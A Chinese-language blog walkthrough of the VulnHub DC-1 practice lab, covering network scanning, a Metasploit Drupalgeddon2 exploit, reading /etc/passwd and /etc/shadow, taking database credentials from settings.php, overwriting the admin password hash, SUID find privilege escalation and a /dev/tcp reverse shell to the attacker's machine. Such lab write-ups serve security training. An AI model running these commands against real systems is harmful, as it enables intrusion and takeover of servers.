前言
参考大佬的blog进行一次实践,入门级的学习,写得不好请见谅!

本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。

一. 环境搭建

1.准备工具

虚拟机Kali:

DC-1靶场机:
官网下载 https://download.vulnhub.com/dc/DC-1.zip

2.靶场准备

更改网络地址为网桥模式:

配置时取消的usb2.0配置,不然可能是virsual版本的问题,会报错。

二. 渗透过程

1. 信息收集

探测目标IP地址

先使用nmap,没有扫描到mac地址和更详细的信息,没法区别目标机

nmap -sP 192.168.3.0/24


接下下换netdiscover

sudo netdiscover -i eth0 -r 192.168.3.1/24


开了好几个虚拟机,排除找到目标机IP:192.168.3.112

探测目标IP开放端口

使用nmap探测靶机开放端口:可以看到开放22、80、111端口,确定有http服务。

nmap -sS 192.168.3.112

访问目标机地址:网页如下

2. 漏洞查找与利用

2.1弱口令

通过burp测试一下弱口令,爆不出来,而且需要认证,感觉好麻烦,试试cms相关漏洞。

2.2Drupalgeddon2

Searchsploit查一下Drupal7相关漏洞:
(官方指南:Exploit Database SearchSploit Manual)

searchsploit 使用参考 https://blog.csdn.net/qq_38243607/article/details/107140817

msfconsole

开启msf查找一下可以利用的漏洞:先选择Rank‘excellent’、Check‘Yes’和日期最新的利用,与searchsploit结果对比一下,发现可以选择no.1。

3. Getshell

3.1交互式shell

使用 python 的 pty 来转换为 交互式shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’

3.2flag1

Shell后先ls一下看看,发现一个flag1.txt:

cat查看一下,大概意思是提示所有cms需要配置文件,所以让我们去找drupal的配置文件。

3.3Linux信息收集

先不急着找配置文件,既然已经进来了就收集一波信息

1>DNS客户机配置文件(虽然对于这次靶场没啥用)
cat /etc/resolv.conf

2>系统用户配置文件

cat /etc/passwd

哦吼,发现了一个flag4,路径是/home/flag4,那就提前看一下flag4的内容好了:


翻译一下大概是说“用同样的方法找到存在root里的flag”,不明所以,不过应该要求我们提权(一会再搞)。

3>查存储的用户密码信息:没有权限

cat /etc/shadow

4>我是谁:
Whoami/who -a

5>查看进程信息:

发现了mysql进程,一会试试爆库。

ps aux

6>简单看一下刚进来时各个文件夹内都有什么文件:



4. 数据库渗透

4.1flag2,数据库用户密码

简单过一遍linux信息后,回来根据提示去找drupal配置文件。

根据相关链接:
Step 3: Create settings.php and the files directory | Installing Drupal 7 | Drupal Wiki guide on Drupal.org
https://toutiao.io/posts/vam02/preview

我们可以知道Drupal会在sites/default/files目录下写入各种文件,而default.settings.php为Drupal的样本配置文件,安装时需将其复制并命名为‘settings.php’,所以现在应该去找到这个文件。

首先进入sites/default/files,逛了一圈没有东西:

返回上级目录,发现了settings.php:

查看settings.php文件内容:嘿嘿,找到了flag2,同时还发现了数据库用户及密码。

4.2数据库信息收集

使用刚刚得到的用户密码登录数据库:

查看表信息:发现一个users表

查看users表信息,发现用户密码:

(加密的密码试试破解)

5. 用户密码爆破

5.1hash解密(失败)

先用kali自带的hash工具过一下密码(加盐了没用)

加了盐没办法,不过根据打过的红日3靶场可以试试其他方法,即新建新的用户密码或修改已有的密码。

5.2修改密码(成功),flag3

网上搜一搜drupal修改密码,发现Drupal 7已不再采用Drupal 6和5时代的简单的MD5加密了而是采用了新型的Hash加密方法来确保密码安全。而加密脚本是password-hash.sh。

巧了,之前搜集信息时恰好在scripts目录下发现了该脚本。

当然也可以使用find找一下:

find / -name ‘hash’


通过该脚本新设置一个密码‘123456’:

scripts/password-hash.sh ‘123456’> test.txt


再次进入数据库更新一下admin的密码:

update users set pass=’you-password’ where uid=1;



翻车,没有搜索到flag3

6. Linux提权

6.1find 指令提权

首先找一下find路径:

which find

再检查一下find是否有suid权限:

ls -l /usr/bin/find

最后使用find命令执行一下‘whoami’发现是root权限:

touch getrootfind / -type f -name getroot -exec “whoami” \;

6.2find命令nc监听反弹shell

先在kali上开启nc监听:

nc -lvvnp 6666

Msf中执行构建好的find命令:

find /etc/passwd -exec bash -ip>& /dev/tcp/192.168.3.172/6666 0>&1 \;

id
cd /root
ls

参考:https://blog.csdn.net/ierciyuan/article/details/127282461

vulnhub靶机试验DC-1相关推荐

  1. Vulnhub靶机DC系列-DC-8

    Vulnhub靶机DC系列-DC-8 靶场名称:DC-8 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ 下载地址: DC-8.zip (Size: 379 ...

  2. Vulnhub靶机渗透学习——DC-9

    本文仅个人学习所做笔记,仅供参考,有不足之处请指出! vulnhub靶机 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试.提权. ...

  3. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

  4. Vulnhub靶机系列:SecTalks: BNE0x03 - Simple

    这次的靶机是vulnhub靶机:SecTalks: BNE0x03 - Simple 文章目录 靶机地址及相关描述 靶机地址 靶机描述 Simple CTF Location Hints 靶机设置 利 ...

  5. 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】

    靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...

  6. [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)

    这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...

  7. Vulnhub靶机:EVILBOX_ ONE(很详细)

    目录 介绍 信息收集 主机发现 主机信息探测 网站探测 目录扫描 目录扫描字典 爆破页面参数 Burpsuite爆破参数 ffuf 补充:区分文件包含与文件读取 文件包含漏洞 文件包含.任意文件读取的 ...

  8. Vulnhub靶机Wakanda渗透测试攻略

    前言 Wakanda是一个新的交易市场网站,很快会上线了.你的目标是通过黑客技术找到"振金"的确切位置. 页首配图 本vulnhub靶机环境由xMagass开发,并托管于Vulnh ...

  9. VMware检测不到vulnhub靶机IP地址解决办法

    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 vulnhub靶机检测不到IP地址解决办法 原因一:查看网络适配器是否为NAT模式 原因二:虚拟网络编辑器配置出错 原因三:靶机网卡配 ...

  10. VulnHub靶机-Jangow: 1.0.1

    NO.1 VulnHub靶机-Jangow: 1.0.1 迟到的文章,就当库存发出来吧~ by AnQtroops 2022.9.10 0x00 靶机信息 1.下载地址:https://www.vul ...

最新文章

  1. OpenCV3.0中的离散傅里叶变换
  2. Singing Superstar 字符串哈希-map操作
  3. 对拉格朗日乘子法与KKT的理解
  4. 功能自动化工具watiJ(转载)
  5. Struts2拦截器实现异常处理机制
  6. 移动应用开发——作业3
  7. Jeecg入门篇,高手掠过
  8. 项目管理九大知识点输入输出
  9. DTO,VO,POJO,JavaBeans之间的区别?
  10. 一题多解 —— 同时找到序列的最大值最小值
  11. linux 正则表达式
  12. OAuth2.0+SpringSecurity+Jwt实现系统的登录认证,用户授权
  13. python模块中函数的用法_怎么使用help函数查看python模块中函数的用法
  14. godis之aof持久化
  15. 设备驱动安装不上怎么办?
  16. 约当标准型_约当标准形矩阵对应的“基”是什么?
  17. ACM-ICPC国际大学生程序设计竞赛亚洲区大连赛区(2016)地区赛——花开花落终有时
  18. Windows:忘记本地账户开机密码,但记得住PIN码
  19. 微信小程序连接阿里云物联网平台——物联网远程控制开发1
  20. 跨平台AR增强现实开发(一)(AR开发环境的搭建)

热门文章

  1. C++【10】构造函数、析构函数何时被调用?
  2. 程序员该如何爱老婆,对老婆好
  3. 设置log4j2自动删除过期日志
  4. SEO思维赚钱模式解读-海瑶SEO学堂
  5. MODIS MCD12Q1数据批量提取
  6. 机器学习讲堂 sklearn.svm包中的SVC(kernel=”linear“)和LinearSVC的区别
  7. php发送邮件不成功,关于thinkphp 发送邮件不成功的问题
  8. SRM 611 div2
  9. [前端开发] 未来趋势“无后端”的web应用开发模式
  10. Audition测试项目制作